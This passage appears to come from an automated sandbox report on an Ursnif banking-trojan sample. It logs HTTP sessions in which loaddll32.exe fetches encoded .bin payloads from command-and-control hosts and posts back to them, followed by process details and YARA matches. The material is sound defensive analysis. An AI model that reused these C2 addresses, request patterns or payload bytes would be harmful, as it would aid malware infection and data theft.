36 94 b4 7b 60 29 d2 7a 79 b1 1d fc 6b 2c 0e 83 2c bd b9 be f1 3c b8 85 5b 3b 1f c6 03 de 33 6c 70 a1 b8 0e e3 06 bc 3b 6d 7e d2 37 fd b2 64 79 f0 1e ee 51 35 4c c9 10 7b b6 52 54 f2 27 48 b6 0c 42 a9 91 1b 7c ab eb 9c 8e 11 3c e7 92 dc 9e 62 cd 9e a0 26 c1 2f 04 07 ec db 39 a7 26 ad ac 7b b2 b3 91 27 6f 53 c0 04 28 85 46 6d 27 ab c9 59 89 a5 fd 39 60 bb a1 47 56 a4 4f 29 d9 e6 0d 70 3d 52 6d 12 58 17 26 70 e5 95 c1 71 09 bf 3e 6d 7c 92 6e 6f b8 dd a0 89 00 a9 09 77 09 1a 13 fb 97 45 9c 25 1e 90 69 fe 0a 81 fe bd 21 5d 31 08 da 96 88 42 64 1a 1e 05 e4 8d 37 ef e2 7b 90 34 2a 5a 64 eb 22 17 76 03 be 79 76 ee 07 31 65 d8 25 ca af ed 46 90 ba 45 7e ed 21 eb 7a 87 1a 68 1e 76 d2 d0 5a 94 91 a9 ae 1c 1c ce c2 2f 77 74 5a ae 89 bb 1e 3b 58 d9 07 7b bd b2 6d 49 d8 a7 f8 1e 4f db 5c 58 cd fa 93 9b ae 79 d5 37 b3 36 8f af 78 71 65 84 0c dc b6 c6 80 bf d5 67 08 c0 97 f3 8b 4e 38 8d 0a f0 e7 13 b9 28 ec 97 66 81 db 9f f0 84 29 cc f0 36 4b 19 ef c4 8a 85 36 6b 81 be f0 dc be 64 1d 66 b8 f9 57 6b b4 00 84 a1 7e ed 72 46 ed 30 86 fb 19 d1 cf 12 f7 b2 6a cb 6b 94 d5 e3 40 e4 c1 93 e3 3d 0f ce 84 63 1b 12 eb 94 a1 9c 29 37 e2 6d 48 f6 b1 be 77 f3 71 6c 9c 30 23 54 53 14 b5 e2 f0 82 8b 6c 4d c4 2c ba 24 d2 76 b7 9a 02 b3 8a 47 50 a5 64 21 64 07 13 16 26 48 9d 6b 52 d5 4f f6 71 59 bd 55 39 44 d1 ba 4a b3 15 7e 42 cb 16 25 3a 50 43 a9 1e 0a 71 79 9a 3f 33 cb d9 1c 73 ea c0 3a 75 01 3d a2 67 ee 7d 09 d1 48 1d 28 02 66 ea da f9 8a 83 58 d2 8d 47 e5 34 aa 3c 1c 78 37 67 fc 97 c6 fd 68 04 12 a6 73 bd 42 0a 19 c9 e3 c3 7e f9 10 56 65 9a 10 1a 22 8f 91 40 47 7a e4 0b 1a 62 8b e2 47 dc 30 f6 f4 26 85 ac 6f 5e 8f ce ca de 3e 15 25 46 c2 2e 70 2f 5c fc 83 25 c0 49 d8 3b 5f 51 b2 9f ee 4a aa cb 2b cc fe c3 d6 94 de 73 cd 99 0a e3 48 9c 0c 65 96 7e cb ce a8 df d6 4b bd 22 ee e2 4a e1 7d d4 b8 0c 60 1a 69 d8 4c 9f ec 71 f9 7d 64 f9 9f 5f 15 d0 be 86 6c ca ac 1c 9e 8d 92 28 60 46 fe d0 b9 b6 f7 1b 36 a1 50 4d 8d 3e e3 7c 2c ee 34 0c f5 8d d8 02 48 8a db 5d 80 c4 5a b8 23 6c 9b 86 42 17 ff 1f 21 93 ff 06 7b 2d d6 2d 54 83 de d3 58 6f 41 c6 ee 78 d4 02 67 14 de 02 2a 1d 55 5e 8c 26 88 23 13 36 49 33 e9 1c a1 97 21 6e ed 0a f4 96 f1 8a 2f ce 5c 0e 30 17 ff 83 80 f8 d0 cc e9 40 3f db ca 66 44 a9 c0 bc 47 84 0b 06 a7 63 53 86 10 42 ab 8d 4b b2 20 18 91 ef a4 fa 7c 27 13 84 42 52 6b 7c 3f 02 7a 58 85 26 fe 49 Data Ascii: !!5SX8J7`[3O\~xP`05"_9L}G\|3k!G'cwB50O()h#urLbm}&_o>LPtom\|c6{`)zyk,,<[;3lp;m~7dyQ5L{RT'HB\|<b&/9&{'oS(Fm'Y9`GVO)p=RmX&pq>m\|nowE%i!]1Bd7{4Zd"vyv1e%FE~!zhvZ/wtZ;X{mIO\Xy76xqegN8(f)6K6kdfWk~rF0jk@=c)7mHwql0#TSlM,$vGPd!d&HkROqYU9DJ~B%:PCqy?3s:u=g}H(fXG4<x7ghsB~Ve"@GzbG0&o^>%F.p/\%I;_QJ+sHe~K"J}`iLq}d_l(`F6PM>\|,4H]Z#lB!{--TXoAxgU^&#6I3!n/\0@?fDGcSBK \|'BRk\|?zX&I

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49725	185.228.233.17	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:26:33.906869888 CEST	1662	OUT	GET /xpQtxUX3h_2FQKxJhfUx/G0zs_2BNyFnX7DIXqIv/lnFizf7MXIsO8WrV7iWZn_/2BjQPC7zwHzVS/342TzGfK/2qMhdDtEUWr3PuMULGHY7Wo/oH2PWiLOuv/rVab55pGcs3BjCEFy/fjf5J0mtPw74/bUga6aKy9a0/8sjdMu3LKL0W9F/lJKdHZn6kyKDin_2BwMdR/Co0bi6iqwKADh3im/EkdX1PzjugiiFzL/eq7opWWHrRFIO6DADe/KGFblEs7Y/dlX3yYwk_2BuqKiUtLfZ/ayAcx2n0s2knyq63tAp/4ZU8TWhq99lb0QUr9JY6xW/K9imquPwClp_2Bwu/6UIrfdf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 3, 2021 20:26:34.468538046 CEST	1664	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 18:26:34 GMT Content-Type: application/octet-stream Content-Length: 194716 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61098a5a670a6.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: b0 0f 98 92 d9 2f 37 fa 2a 44 78 6a 16 79 e1 e6 5a b1 46 45 37 b2 fa a3 3a 0e af f7 e6 fc b9 86 58 2a 7d 47 93 08 7e 22 15 7d 96 d2 f3 e9 29 e8 a6 76 28 45 a5 b4 8a 05 c6 eb 38 37 5d 7f d8 93 01 d0 69 e7 fb db 8a ca 43 e1 a1 dd 2d 07 7c 70 d1 3c e6 41 3c f7 67 f5 63 e7 a5 b4 64 0f b2 f6 d5 1c 1a d5 ba 84 32 68 4a d2 49 fa 0e e4 e8 fb eb c1 97 23 10 cd 7e 1a 64 5a ec 8c d9 6f f1 7d 92 ea 3a 33 22 41 9f 1c 8d 75 43 eb 60 41 f4 ac 26 24 9c 9c 0b 68 79 50 90 7b 16 2e ab 87 f0 7f 1c 62 c4 8b 3b 06 7f bd a3 4e 2b f6 c4 bc 55 e6 6c cc 7a 59 4a ef 66 0e 12 4f 23 57 24 fc 2a e3 ff fe e7 c2 48 a3 96 42 b3 08 d6 c9 e2 ca d5 ea a3 eb f6 f8 05 42 51 61 73 04 44 55 ea 58 ce e3 5a 54 55 54 f3 a0 5a a5 06 38 5c 1f 16 53 ad c8 c3 92 98 e6 28 a0 05 77 8e d9 0f b2 31 ff 43 2b 5c c8 c5 5a 1d 23 3d 1a e6 7c 36 1d c4 8f f5 47 21 2b fa 12 1d cb 2c 60 26 6a 09 92 44 65 cf 6f d3 2e ef 72 8a 29 1b 4b bc 6b cb e8 11 10 fd bf 36 57 95 af 43 5d f0 73 4c 8a 7b 99 85 d5 51 8c b1 c5 2d 19 41 7f 45 43 0a da b2 19 6c 49 ed 90 66 6c 95 d7 07 cb 8f be 6d 74 fb 57 9e a9 df 80 f3 9c 82 d6 db 11 58 69 b1 ba df 28 92 1f c7 ec 3e f3 46 db 41 93 bd 72 2a 79 13 e0 31 b6 02 4c 18 b3 f8 3a 34 42 f7 2b 10 93 d1 41 5a 67 bd 3c db 79 36 f8 6e f6 9b 61 5d 94 1f d6 e9 c9 03 1b 89 96 ad a5 90 28 5d 19 c5 7c fe 93 25 15 b0 17 cc 6f d5 43 72 bf 1e 2f 78 21 f1 a2 9a 27 db 0e d2 51 54 ec 00 f7 ab e3 24 61 0c db 60 43 d3 f2 ee 0d a4 75 bd 4f d9 ad a8 b2 9f f3 9b 69 d8 3d 97 cc 6d 9f 37 bb e6 c5 b7 10 6b 9b ce f6 e7 6b 58 2f 7f f3 a1 f5 11 40 86 49 ab 9e b0 c2 a4 d1 7d da 93 80 e6 07 9c 62 50 43 70 32 da 28 9d b2 22 71 a9 4e 41 44 13 c1 0e 0f e3 94 60 d0 a8 2b e9 97 8e b4 df 6b 42 ef 8e 01 13 22 cf dd 25 3b ec bf 8c d0 92 98 e5 eb 07 a1 43 96 c2 62 36 a1 44 50 e8 ed 08 6e 52 4e 88 99 9e e7 86 d5 99 bc 0b 93 bb 11 6b 43 2e 27 ad 3f d6 c7 b0 9e dd 36 bf a9 11 2f 65 05 a6 62 8f 27 da af d8 fe b7 c5 39 d6 3d f3 af 6c 50 4a 90 94 39 89 04 8d a3 a3 f3 94 e4 d5 1e 3c 5c 5f d6 02 00 67 a9 76 a1 64 bf ad 0c d1 23 e1 19 95 cc 2f c8 7e 97 93 73 4c b9 8e 17 8f 9e b1 5e 74 78 f2 17 7e 78 64 30 04 b2 7b fd e1 79 66 c5 b5 14 df 9a 8e 55 5a d4 c8 db 6e 92 e6 ca 22 9e b2 30 50 3d 69 7d bc 07 f7 4f 53 3f e6 ca 7d 65 af f0 7d 93 2e 51 4c 63 4b 4f 2f 48 c7 d3 af d5 19 26 ae a3 d9 2d 67 1d 56 f7 32 36 7e ac 4e 2a 5f bd 8d 09 99 a8 ec 94 44 7b 18 c3 46 77 dd bb de 93 bb 91 12 79 49 8d 41 7e 0f ee 2d 00 29 ca 74 ff a6 4e 9d 85 52 50 8c e2 cd a0 2e 03 25 3c 8d c4 a7 0f 4f 4e fd bd 1f ed eb 24 65 61 09 6f 4d f7 e6 16 e2 01 32 32 b9 41 23 66 4f a4 9e 82 86 64 c5 c7 4d 43 a4 d6 8e 51 63 ab d3 6e aa 85 0d 43 6e 4f d3 e6 ea 35 0e 53 cb 1a 04 2b 67 43 71 a9 8d c1 2d 24 1e 35 0b 02 ca 72 00 1c 7e c0 6e 37 9d 6d ca 91 70 7d ec 2e 8c a6 28 0a 39 e2 d6 68 a4 f2 f2 14 cc 24 9c e6 b9 4b 3b 81 10 61 Data Ascii: /7DxjyZFE7:X}G~"})v(E87]iC-\|p<A<gcd2hJI#~dZo}:3"AuC`A&$hyP{.b;N+UlzYJfO#W$HBBQasDUXZTUTZ8\S(w1C+\Z#=\|6G!+,`&jDeo.r)Kk6WC]sL{Q-AEClIflmtWXi(>FAry1L:4B+AZg<y6na](]\|%oCr/x!'QT$a`CuOi=m7kkX/@I}bPCp2("qNAD`+kB"%;Cb6DPnRNkC.'?6/eb'9=lPJ9<\_gvd#/~sL^tx~xd0{yfUZn"0P=i}OS?}e}.QLcKO/H&-gV26~N*_D{FwyIA~-)tNRP.%<ON$eaoM22A#fOdMCQcnCnO5S+gCq-$5r~n7mp}.(9h$K;a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49726	185.228.233.17	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:26:35.523715019 CEST	1869	OUT	GET /08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 3, 2021 20:26:36.070445061 CEST	1870	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 18:26:36 GMT Content-Type: application/octet-stream Content-Length: 247966 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61098a5c05845.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 89 d6 f2 27 b9 43 a7 fd f1 9e 9c 7a ac b2 56 33 c6 37 0c 17 d9 36 1d 09 ab 0f e5 b2 cc 32 35 4f 2c 82 78 ba 0d 4c 22 c2 65 d9 25 df 8f ed d7 1d df ff 0d b5 19 39 08 68 c6 1f 5b 77 11 64 a4 38 8e 0d ef 2e d4 db 88 ec 73 f2 30 8a ff 40 fc 5f 25 ce ac d7 e4 57 a1 97 5c b6 41 a9 8d 12 12 55 b1 3b 8a f2 e3 42 fe 27 05 8a 95 fe 30 22 6a 62 96 07 98 87 67 e2 c5 14 81 03 3d da 3c 66 24 7a 67 79 1c 54 05 9e ee 20 73 5b e5 0a 47 39 6a bd 62 81 71 37 04 c1 f6 34 54 f2 86 81 5d c4 43 b7 bb f9 b3 1b 27 09 ae 3c fc fb 4e 43 4c b0 ed 0b 54 a8 14 06 39 95 f5 63 37 50 8d b7 a0 cf d8 da 32 10 81 64 7c 85 df 1b 97 47 a7 cd 27 d2 d4 c5 cd 07 19 a0 a9 e3 7a 9c e9 28 41 59 54 d9 a0 fe 88 64 62 cd 17 b0 89 9e 9f b3 d2 2d c9 62 3e a8 88 a0 89 6b 2a be 9a ca 02 fc fa 31 3e 83 92 3b 9a af c3 0f de 9b 36 11 47 fc e6 c0 c0 4b e8 3f 44 2e d0 b7 b0 1d f3 5c a3 42 5c f3 53 92 cb 1f 16 c2 36 8a c3 38 55 71 ba 77 58 85 cb 0c 59 d9 77 c3 a8 8e 9a cd f5 a2 51 54 27 72 c8 46 d4 5c 30 45 19 6a f7 7c 59 08 5e 02 92 3e 94 04 62 8b 60 b3 8d da a4 90 2f c9 57 63 26 ab 52 8f ca c6 fd ac c9 37 04 bb 6b 5b fb 59 c3 50 0c df 81 60 bc 16 be ec 32 13 67 bd e2 46 27 8c 4b 57 58 b6 90 5e cc 2d f6 61 fb 48 91 24 4d 54 55 7d 88 9f 66 98 e7 e6 0c 28 17 c7 20 60 c8 12 c4 35 10 4c dd db 66 df 22 68 ff c9 31 7d 6c bd 2e 0b e7 47 04 89 29 76 7a 19 d0 ea ae 45 d8 bc 14 07 fb 0c 42 df 9c 7a ab 40 85 a9 f8 77 f2 7d ba c2 84 98 64 95 18 02 be 46 98 a0 31 b8 47 0f 7a 63 cb ff d1 1d 06 a7 f0 1c c0 e7 70 d7 0c c5 08 89 8f 6c 48 cb 1b e7 87 1d 66 20 6b 07 6d ef 2b d3 05 f1 7b 7f 37 87 57 e2 e4 d2 24 35 a8 ec 66 1f cc 97 84 e6 2c f8 37 fd 4a 67 85 15 da a3 dc a7 f6 c3 63 cb 0a b1 d6 06 88 99 61 3c aa a3 d9 9b c0 0d 3c b6 42 cf ad 4b 08 dd 41 c8 8d 45 9e 19 eb ef 6e 77 74 5c 04 05 4c cb 65 3e b5 aa a0 c3 1e 5d 88 3e 2e 46 82 35 b1 5b 60 64 3b bf 68 0a 6d fa b9 15 c1 53 82 86 d7 a0 af 8c f9 f6 2e 8a e3 97 f0 6f 9d 84 e8 71 64 0d 7f 44 8d a1 6d 83 41 51 c8 17 c1 e1 2e 63 9d 1d 57 7e 7c d7 46 70 b4 1a 5f 26 31 1d ca b0 8b 27 f3 b6 41 d8 55 99 eb da 70 66 82 39 49 bf e8 69 24 38 8b ca b9 82 6a 58 53 e2 b4 dc b0 ee 14 91 df 9a 90 fe 34 f5 bb 1d 11 5e 88 25 9d 6c 77 22 c7 fe 70 3a a6 d7 b2 f5 d9 58 f1 37 1f 61 d7 62 c5 ec 1e 4b 0e 67 98 7b ae 55 a1 e4 3f a8 30 2b bd 72 8b a6 04 21 ef 0b 33 08 49 61 53 a0 31 99 25 71 44 bd 4c 08 cc c3 00 36 bc 31 94 03 41 8f 52 8c 34 96 01 6a 93 d1 29 8e 29 72 8a 76 50 4d 12 25 67 db ce a1 e1 97 82 78 57 4e 60 3c c7 88 c5 e9 8b da d9 bd b0 cb 9f 58 8c 42 6a 57 f0 f0 4d 47 95 68 1a e2 1e d5 aa 46 99 d9 6c 69 17 6e 92 72 f0 c3 88 3d d5 fb 77 f1 4d d0 19 8e c7 14 35 00 7b 72 97 70 ea 30 bb df de 69 5f d8 3d 71 24 cb da c2 a1 a8 5d 90 53 31 4b 20 50 76 a5 f3 6d f8 a6 90 47 e7 c8 b2 80 07 2f 16 be ac f8 5d df 87 35 8a b0 f3 c3 b4 90 87 92 96 8e af b9 Data Ascii: 'CzV37625O,xL"e%9h[wd8.s0@_%W\AU;B'0"jbg=<f$zgyT s[G9jbq74T]C'<NCLT9c7P2d\|G'z(AYTdb-b>k*1>;6GK?D.\B\S68UqwXYwQT'rF\0Ej\|Y^>b`/Wc&R7k[YP`2gF'KWX^-aH$MTU}f( `5Lf"h1}l.G)vzEBz@w}dF1GzcplHf km+{7W$5f,7Jgca<<BKAEnwt\Le>]>.F5[`d;hmS.oqdDmAQ.cW~\|Fp_&1'AUpf9Ii$8jXS4^%lw"p:X7abKg{U?0+r!3IaS1%qDL61AR4j))rvPM%gxWN`<XBjWMGhFlinr=wM5{rp0i_=q$]S1K PvmG/]5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49727	185.228.233.17	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:26:37.072709084 CEST	2131	OUT	GET /mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 3, 2021 20:26:37.592834949 CEST	2133	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 18:26:37 GMT Content-Type: application/octet-stream Content-Length: 1958 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61098a5d84fa5.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 87 83 b8 e8 e8 95 f2 1c 21 02 21 fc 35 53 58 88 38 4a 37 95 60 5b 9e ec 33 4f 88 5c 7e 78 8f 15 50 60 d9 00 fc 99 ab 94 86 e1 18 30 10 9a 9d 14 35 9e 83 22 5f d2 ba 8e b0 39 4c 04 7d c2 47 ff 9c 7c d2 af 8a 33 6b 1e 84 21 c2 0a e1 47 0e e5 27 ad a7 63 fe 96 77 f7 07 42 35 88 30 4f c7 fa 8d c4 ae 04 aa 28 29 0e 68 23 a7 fe 75 e3 72 4c 62 6d a5 0b e3 aa ea 7d 95 87 04 26 5f 6f e3 3e 4c d4 c7 d9 aa 01 50 74 6f a0 c9 a5 ab 95 6d bb 08 1d b8 af 7c 63 36 94 b4 7b 60 29 d2 7a 79 b1 1d fc 6b 2c 0e 83 2c bd b9 be f1 3c b8 85 5b 3b 1f c6 03 de 33 6c 70 a1 b8 0e e3 06 bc 3b 6d 7e d2 37 fd b2 64 79 f0 1e ee 51 35 4c c9 10 7b b6 52 54 f2 27 48 b6 0c 42 a9 91 1b 7c ab eb 9c 8e 11 3c e7 92 dc 9e 62 cd 9e a0 26 c1 2f 04 07 ec db 39 a7 26 ad ac 7b b2 b3 91 27 6f 53 c0 04 28 85 46 6d 27 ab c9 59 89 a5 fd 39 60 bb a1 47 56 a4 4f 29 d9 e6 0d 70 3d 52 6d 12 58 17 26 70 e5 95 c1 71 09 bf 3e 6d 7c 92 6e 6f b8 dd a0 89 00 a9 09 77 09 1a 13 fb 97 45 9c 25 1e 90 69 fe 0a 81 fe bd 21 5d 31 08 da 96 88 42 64 1a 1e 05 e4 8d 37 ef e2 7b 90 34 2a 5a 64 eb 22 17 76 03 be 79 76 ee 07 31 65 d8 25 ca af ed 46 90 ba 45 7e ed 21 eb 7a 87 1a 68 1e 76 d2 d0 5a 94 91 a9 ae 1c 1c ce c2 2f 77 74 5a ae 89 bb 1e 3b 58 d9 07 7b bd b2 6d 49 d8 a7 f8 1e 4f db 5c 58 cd fa 93 9b ae 79 d5 37 b3 36 8f af 78 71 65 84 0c dc b6 c6 80 bf d5 67 08 c0 97 f3 8b 4e 38 8d 0a f0 e7 13 b9 28 ec 97 66 81 db 9f f0 84 29 cc f0 36 4b 19 ef c4 8a 85 36 6b 81 be f0 dc be 64 1d 66 b8 f9 57 6b b4 00 84 a1 7e ed 72 46 ed 30 86 fb 19 d1 cf 12 f7 b2 6a cb 6b 94 d5 e3 40 e4 c1 93 e3 3d 0f ce 84 63 1b 12 eb 94 a1 9c 29 37 e2 6d 48 f6 b1 be 77 f3 71 6c 9c 30 23 54 53 14 b5 e2 f0 82 8b 6c 4d c4 2c ba 24 d2 76 b7 9a 02 b3 8a 47 50 a5 64 21 64 07 13 16 26 48 9d 6b 52 d5 4f f6 71 59 bd 55 39 44 d1 ba 4a b3 15 7e 42 cb 16 25 3a 50 43 a9 1e 0a 71 79 9a 3f 33 cb d9 1c 73 ea c0 3a 75 01 3d a2 67 ee 7d 09 d1 48 1d 28 02 66 ea da f9 8a 83 58 d2 8d 47 e5 34 aa 3c 1c 78 37 67 fc 97 c6 fd 68 04 12 a6 73 bd 42 0a 19 c9 e3 c3 7e f9 10 56 65 9a 10 1a 22 8f 91 40 47 7a e4 0b 1a 62 8b e2 47 dc 30 f6 f4 26 85 ac 6f 5e 8f ce ca de 3e 15 25 46 c2 2e 70 2f 5c fc 83 25 c0 49 d8 3b 5f 51 b2 9f ee 4a aa cb 2b cc fe c3 d6 94 de 73 cd 99 0a e3 48 9c 0c 65 96 7e cb ce a8 df d6 4b bd 22 ee e2 4a e1 7d d4 b8 0c 60 1a 69 d8 4c 9f ec 71 f9 7d 64 f9 9f 5f 15 d0 be 86 6c ca ac 1c 9e 8d 92 28 60 46 fe d0 b9 b6 f7 1b 36 a1 50 4d 8d 3e e3 7c 2c ee 34 0c f5 8d d8 02 48 8a db 5d 80 c4 5a b8 23 6c 9b 86 42 17 ff 1f 21 93 ff 06 7b 2d d6 2d 54 83 de d3 58 6f 41 c6 ee 78 d4 02 67 14 de 02 2a 1d 55 5e 8c 26 88 23 13 36 49 33 e9 1c a1 97 21 6e ed 0a f4 96 f1 8a 2f ce 5c 0e 30 17 ff 83 80 f8 d0 cc e9 40 3f db ca 66 44 a9 c0 bc 47 84 0b 06 a7 63 53 86 10 42 ab 8d 4b b2 20 18 91 ef a4 fa 7c 27 13 84 42 52 6b 7c 3f 02 7a 58 85 26 fe 49 Data Ascii: !!5SX8J7`[3O\~xP`05"_9L}G\|3k!G'cwB50O()h#urLbm}&_o>LPtom\|c6{`)zyk,,<[;3lp;m~7dyQ5L{RT'HB\|<b&/9&{'oS(Fm'Y9`GVO)p=RmX&pq>m\|nowE%i!]1Bd7{4Zd"vyv1e%FE~!zhvZ/wtZ;X{mIO\Xy76xqegN8(f)6K6kdfWk~rF0jk@=c)7mHwql0#TSlM,$vGPd!d&HkROqYU9DJ~B%:PCqy?3s:u=g}H(fXG4<x7ghsB~Ve"@GzbG0&o^>%F.p/\%I;_QJ+sHe~K"J}`iLq}d_l(`F6PM>\|,4H]Z#lB!{--TXoAxgU^&#6I3!n/\0@?fDGcSBK \|'BRk\|?zX&I

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49738	185.228.233.17	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:27:49.690335989 CEST	4237	OUT	GET /p0mrlA_2F3nwmuOO5YjXTbA/cd8IEyE4_2/FI8A_2FRC5apSNIFU/7NfGVV9uGpRL/s6DAoaMbBtN/eYfp7C4d_2F3Is/s4XG4SPnRiQ7lPcEUOZTG/dYTbEto_2F1qrOzS/I0vg3Aj3uP5f_2F/4uoaP31e5KEGdC1u9L/oWhwQd6oE/Nvhp83GHi3mH9zcVaKW0/JwD5AHcQxGrogNbSOUn/soZuo4elXh3sevhCFwKNDb/LefWHBaTOp39g/WKwxmRdA/L1LsDG1W8J3kilFzwHSP3cM/ofk_2BkzS2/fYG6a0xp2L0bHH9qT/VzjD_2B4vW7z/v2KCn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Host: app.flashgameo.at
Aug 3, 2021 20:27:50.222759008 CEST	4237	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 03 Aug 2021 18:27:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49739	185.228.233.17	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:27:50.596281052 CEST	4238	OUT	POST /OiT_2FirHnJjoHi9Wz9/lRYYufFMTul_2B_2BY5CkW/SD8SHNDbwgWIv/CzkJRl4V/2qlIA9Op7QeGDe_2FdwjIV7/xPEy8vzfH2/VxoY4K2lc_2FXWXvK/mDsSgC08BTqd/mqIKDTZ_2F9/kA8vkXWNOd488F/ErqgFvCrl5Yz6usP1jvws/BevN_2BeaMhEHvMh/FRgus9uETEHjdsv/FSZwcCE4sYXuHvntAo/tvQ8Ok9Ns/ghPnWtwC3QyjsPH942Uo/R1DuZ1r1nnC3Zyx8YUp/2fidg_2Fh8kkAMOPis4sXs/5aKWUUxdSRpaI/n_2FzGZTe/pJ3zVp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Content-Length: 2 Host: app.flashgameo.at
Aug 3, 2021 20:27:51.118220091 CEST	4239	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Aug 2021 18:27:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5780 Parent PID: 5624

General

Start time:	20:25:11
Start date:	03/08/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll'
Imagebase:	0xb60000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 